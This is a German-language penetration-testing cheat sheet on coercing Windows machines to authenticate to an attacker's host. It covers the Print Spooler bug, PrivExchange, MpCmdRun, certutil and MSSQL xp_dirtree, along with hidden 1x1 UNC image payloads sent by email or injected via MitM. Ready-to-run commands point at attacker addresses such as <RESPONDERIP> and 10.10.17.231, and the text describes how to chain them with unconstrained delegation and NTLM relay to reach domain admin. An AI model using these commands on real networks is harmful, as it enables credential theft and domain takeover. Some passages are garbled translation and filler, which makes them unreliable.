SharpSystemTriggers

SharpSystemTriggers ist eine Sammlung von in C# codierten Remote-Authentifizierungstriggern, die den MIDL-Compiler verwenden, um von Drittanbieterabhängigkeiten abzusehen.

Missbrauch des Spooler-Dienstes

Wenn der Print Spooler-Dienst aktiviert ist, können Sie einige bereits bekannte AD-Anmeldeinformationen verwenden, um vom Druckserver des Domänencontrollers eine Aktualisierung zu neuen Druckaufträgen anzufordern und ihm einfach mitzuteilen, dass er die Benachrichtigung an ein bestimmtes System senden soll. Beachten Sie, dass, wenn der Drucker die Benachrichtigung an ein beliebiges System sendet, es sich gegen dieses System authentifizieren muss. Daher kann ein Angreifer den Print Spooler-Dienst dazu bringen, sich gegen ein beliebiges System zu authentifizieren, und der Dienst wird dabei das Computerkonto verwenden.

Suche nach Windows-Servern in der Domäne

Verwenden Sie PowerShell, um eine Liste der Windows-Boxen zu erhalten. Server haben normalerweise Priorität, daher konzentrieren wir uns darauf:

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

Ermittlung von Spooler-Diensten, die zuhören

Verwenden Sie eine leicht modifizierte Version von @mysmartlogin's (Vincent Le Toux's) SpoolerScanner, um festzustellen, ob der Spooler-Dienst zuhört:

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

Sie können rpcdump.py auch unter Linux verwenden und nach dem MS-RPRN-Protokoll suchen.

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

Fordern Sie den Dienst auf, sich gegen einen beliebigen Host zu authentifizieren

Sie können SpoolSample von hier kompilieren (https://github.com/NotMedic/NetNTLMtoSilverTicket).

SpoolSample.exe <TARGET> <RESPONDERIP>

oder verwenden Sie 3xocyte's dementor.py oder printerbug.py, wenn Sie Linux verwenden.

python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>

Kombination mit uneingeschränkter Delegation

Wenn ein Angreifer bereits einen Computer mit uneingeschränkter Delegation kompromittiert hat, kann der Angreifer den Drucker dazu bringen, sich gegen diesen Computer zu authentifizieren. Aufgrund der uneingeschränkten Delegation wird das TGT des Computerkontos des Druckers im Speicher des Computers mit uneingeschränkter Delegation gespeichert. Da der Angreifer bereits diesen Host kompromittiert hat, kann er dieses Ticket abrufen und missbrauchen (Pass the Ticket).

RCP Force-Authentifizierung

PrivExchange

Der PrivExchange-Angriff ist das Ergebnis einer Schwachstelle im Exchange Server PushSubscription-Feature. Diese Funktion ermöglicht es dem Exchange-Server, von jedem Domänenbenutzer mit einem Postfach erzwungen zu werden, sich über HTTP bei einem beliebigen vom Client bereitgestellten Host zu authentifizieren.

Standardmäßig läuft der Exchange-Dienst als SYSTEM und hat übermäßige Berechtigungen (insbesondere hat er WriteDacl-Berechtigungen auf der Domäne vor dem kumulativen Update 2019). Diese Schwachstelle kann ausgenutzt werden, um das Weiterleiten von Informationen an LDAP zu ermöglichen und anschließend die NTDS-Datenbank der Domäne zu extrahieren. In Fällen, in denen das Weiterleiten an LDAP nicht möglich ist, kann diese Schwachstelle dennoch zum Weiterleiten und zur Authentifizierung bei anderen Hosts in der Domäne verwendet werden. Die erfolgreiche Ausnutzung dieses Angriffs gewährt sofortigen Zugriff auf den Domänenadministrator mit einem beliebigen authentifizierten Domänenbenutzerkonto.

Innerhalb von Windows

Wenn Sie bereits innerhalb der Windows-Maschine sind, können Sie Windows zwingen, sich mit privilegierten Konten mit einem Server zu verbinden:

Defender MpCmdRun

C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt

MSSQL

MSSQL (Microsoft SQL Server) ist ein relationales Datenbankverwaltungssystem, das von Microsoft entwickelt wurde. Es wird häufig in Unternehmen eingesetzt und bietet eine Vielzahl von Funktionen für die Speicherung und Verwaltung von Daten. MSSQL verwendet die SQL-Sprache (Structured Query Language) für die Abfrage und Manipulation von Daten. Es bietet auch erweiterte Funktionen wie Transaktionsverarbeitung, Sicherheit und Skalierbarkeit. MSSQL kann sowohl lokal als auch in der Cloud verwendet werden und ist mit verschiedenen Betriebssystemen kompatibel, einschließlich Windows und Linux.

EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1

Oder verwenden Sie diese andere Technik: https://github.com/p0dalirius/MSSQL-Analysis-Coerce

Certutil

Es ist möglich, das lolbin-Zertifikat certutil.exe (Microsoft-signierte Binärdatei) zur Erzwingung der NTLM-Authentifizierung zu verwenden:

certutil.exe -syncwithWU  \\127.0.0.1\share

HTML-Injektion

Über E-Mail

Wenn Sie die E-Mail-Adresse des Benutzers kennen, der sich in einer Maschine anmeldet, die Sie kompromittieren möchten, können Sie ihm einfach eine E-Mail mit einem 1x1-Bild senden, wie zum Beispiel

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

MitM

Wenn Sie einen MitM-Angriff auf einen Computer durchführen können und HTML-Code in einer Seite einschleusen können, die er visualisiert, könnten Sie versuchen, ein Bild wie das folgende in die Seite einzufügen:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

Knacken von NTLMv1

Wenn Sie NTLMv1-Herausforderungen erfassen, lesen Sie hier, wie Sie sie knacken können. Bedenken Sie, dass Sie zum Knacken von NTLMv1 die Responder-Herausforderung auf "1122334455667788" setzen müssen.